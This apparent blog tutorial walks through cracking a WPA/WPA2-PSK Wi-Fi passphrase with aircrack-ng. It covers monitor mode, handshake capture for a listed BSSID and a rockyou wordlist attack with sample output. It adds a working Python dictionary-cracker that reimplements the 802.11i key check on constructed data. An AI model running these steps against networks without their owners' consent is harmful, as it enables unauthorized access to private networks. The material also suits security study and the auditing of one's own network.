This example assumes that you have a wireless adapter capable of entering monitor mode and that you have the aircrack-ng suite of tools installed. Both come ready to use on the Kali Linux distribution.
Determine the adapter to use for capturing (running airmon-ng with no arguments lists the wireless interfaces it can see, together with their driver and chipset). Make note of your wireless adapter interface, e.g. wlan0. Next we need to use airmon-ng to put it into monitor mode. If airmon-ng warns about processes that could interfere (typically NetworkManager and wpa_supplicant), run airmon-ng check kill first, otherwise they may keep resetting the interface while you capture.
airmon-ng start wlan0
If this has worked it should have created a monitor-mode interface, wlan0mon in our case. Next we can start looking for wireless networks to target by running airodump-ng against that interface (airodump-ng wlan0mon). With no other options it hops across channels and lists every access point and associated client it can hear.
Below is an example of the airodump-ng output. The upper table lists access points; the ENC, CIPHER and AUTH columns tell you which networks are WPA/WPA2 with a pre-shared key (PSK), which is what this attack needs. The lower table lists clients and the BSSID each is associated with. Once airodump-ng has seen a complete 4-way handshake for a network it reports "WPA handshake:" and that BSSID in the top line, as it does here for 00:14:6C:7E:40:80.

 CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:09:5B:1C:AA:1D   11  16       10        0    0  11  54.  OPN              NETGEAR
 00:14:6C:7A:41:81   34 100       57       14    1   9  11e  WEP  WEP         bigbear
 00:14:6C:7E:40:80   32 100      752       73    2   9  54   WPA  TKIP   PSK  teddy

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:14:6C:7A:41:81  00:0F:B5:32:31:31   51  36-24     2       14
 (not associated)   00:14:A4:3F:8D:13   19    0-0     0        4  mossy
 00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1  36-36     0        5
 00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35  54-54     0       99  teddy
We now need to pick a BSSID to target. Look at the ENC, CIPHER and AUTH columns before choosing: NETGEAR is an open network (OPN), so there is no key to crack, and bigbear uses WEP, which is a different attack entirely. The only WPA-PSK network in the listing is teddy (00:14:6C:7E:40:80 on channel 9), and it already has a client attached, so that is the one this example targets. The following locks airodump-ng to channel 9, captures only traffic for that BSSID, and writes the packets to files with the prefix capture (airodump-ng appends a run number to the prefix, so the capture ends up in capture-01.cap, plus .csv and .kismet companions):
airodump-ng wlan0mon --bssid 00:14:6C:7E:40:80 --write capture -c 9
Now wait until the top line of the airodump-ng display shows "WPA handshake:" followed by the target BSSID. What aircrack-ng needs is not a large number of data packets but a complete 4-way handshake, the EAPOL exchange that takes place when a client joins the network, so it will only be captured when a client associates or re-associates while you are listening. You can force connected clients to disconnect and reconnect to hurry this along; that deauthentication attack will be covered in a later article.
Once the handshake has been captured, quit out of airodump-ng. As this example uses a wordlist to guess the network password, we will use /usr/share/wordlists/rockyou.txt, which is shipped with Kali (on current releases it is stored compressed as rockyou.txt.gz and needs to be decompressed with gzip first).
You can use any wordlist you like, just change the path in the following command. The glob capture*.cap matches whatever file airodump-ng wrote under that prefix; if the capture contains more than one network, add -b followed by the target BSSID so aircrack-ng does not have to prompt you for it:
aircrack-ng capture*.cap -w /usr/share/wordlists/rockyou.txt
You should see the progress being updated as aircrack-ng works through the entries in the wordlist. The output will look something like the following:
                                 Aircrack-ng 0.7 r130

                   [00:00:03] 2230 keys tested (733.41 k/s)

                           KEY FOUND! [ password ]

    Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
                     39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

    Transient Key  : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
                     73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
                     AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
                     D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

    EAPOL HMAC     : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD
As you can see our password has been found. This is the most basic example of using the aircrack-ng suite against a WPA/WPA2-PSK network: the network in the listing is WPA with TKIP, but the procedure is identical for WPA2 (CCMP) networks, because aircrack-ng derives the key from the passphrase and checks it against the captured handshake in the same way. It does not apply to WPA3 (SAE), whose handshake cannot be attacked offline like this. The attack can only succeed if the passphrase is actually in the wordlist, so the better the wordlist the higher the chance of finding the password.
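To make clear what aircrack-ng is actually doing with each wordlist entry, and why the three values in its output are called Master Key, Transient Key and EAPOL HMAC, here is an added example that is not part of the original article and not aircrack-ng's own code. It implements the IEEE 802.11i check in Python using only the standard library: the candidate passphrase is stretched with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt) into the PMK, the PMK is expanded into the PTK from the two MAC addresses and the two handshake nonces, and the first 16 bytes of the PTK (the KCK) are used to recompute the MIC of the second handshake message; a match means the candidate is the passphrase. The SSID and MAC addresses are taken from the airodump-ng listing above, but the nonces and the EAPOL frame are constructed for the demo (the "captured" MIC is produced by computing it with the true passphrase first), and the function names are this example's own.

```python
import hashlib
import hmac

# Added example, not aircrack-ng code. Reproduces the per-candidate check the
# wordlist attack performs (IEEE 802.11i key hierarchy); all handshake values
# below are constructed for the demo, not captured from a real network.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK ("Master Key" in aircrack-ng output): PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce, tkip=False):
    """PTK ("Transient Key"): PRF-512 (64 bytes) for TKIP, PRF-384 (48 bytes) for CCMP.
    aa/spa are the AP and client MACs, anonce/snonce the nonces from messages 1 and 2."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64 if tkip else 48)


MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before Key MIC


def eapol_mic(kck, eapol_frame, tkip=False):
    """Key MIC ("EAPOL HMAC") over the frame with its 16-byte MIC field zeroed.
    Descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1 truncated to 16."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if tkip:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce, key_data=b"", tkip=False):
    """Constructed EAPOL-Key message 2 (client -> AP) with an all-zero MIC field."""
    key_info = 0x0109 if tkip else 0x010A  # Pairwise | MIC | descriptor version 1 or 2
    body = (
        bytes([0xFE if tkip else 0x02])     # descriptor type: 0xFE = WPA, 0x02 = RSN
        + key_info.to_bytes(2, "big")
        + (0).to_bytes(2, "big")            # key length (not used in message 2)
        + (1).to_bytes(8, "big")            # replay counter
        + snonce                            # 32-byte key nonce
        + b"\x00" * 16                      # key IV
        + b"\x00" * 8                       # key RSC
        + b"\x00" * 8                       # key ID (reserved)
        + b"\x00" * 16                      # key MIC, zero until computed
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body  # 802.1X v1, type EAPOL-Key


def crack(ssid, aa, spa, anonce, snonce, eapol_frame, captured_mic, wordlist, tkip=False):
    """Dictionary attack: first passphrase whose KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:   # WPA-PSK passphrases are 8 to 63 characters
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce, tkip)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, tkip), captured_mic):
            return candidate
    return None


def demo(true_passphrase="teddybear1", wordlist=("password", "letmein", "teddybear1", "qwerty"), tkip=True):
    """Build a synthetic 'captured' handshake for SSID teddy, then recover the passphrase from the wordlist."""
    ssid = "teddy"
    aa = bytes.fromhex("00146c7e4080")   # AP BSSID from the airodump-ng listing
    spa = bytes.fromhex("000fb5fdfbc2")  # associated client from the same listing
    anonce = hashlib.sha256(b"constructed anonce").digest()  # constructed, not captured
    snonce = hashlib.sha256(b"constructed snonce").digest()  # constructed, not captured
    frame = build_eapol_msg2(snonce, tkip=tkip)
    # What the real client would have sent: the MIC computed with the true passphrase.
    kck = ptk_from_pmk(pmk_from_passphrase(true_passphrase, ssid), aa, spa, anonce, snonce, tkip)[:16]
    captured_mic = eapol_mic(kck, frame, tkip)
    return crack(ssid, aa, spa, anonce, snonce, frame, captured_mic, wordlist, tkip)


if __name__ == "__main__":
    print("KEY FOUND! [ %s ]" % demo())
```

Two things are worth noticing. The 4096 PBKDF2 rounds per candidate are the entire cost of the attack, which is why aircrack-ng reports throughput in the low thousands of keys per second on a CPU and why a wordlist that does not contain the passphrase can never succeed, however long it runs. And because the SSID is the PBKDF2 salt, a PMK computed for one network name is useless against another, so precomputed tables only help for common SSIDs. Against a real capture you would pull the SSID, both MACs, both nonces, the message 2 frame and its MIC out of the pcap (for instance with scapy) and feed them to crack(); aircrack-ng does that parsing for you.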
Check out our other articles on downloading different wordlists here.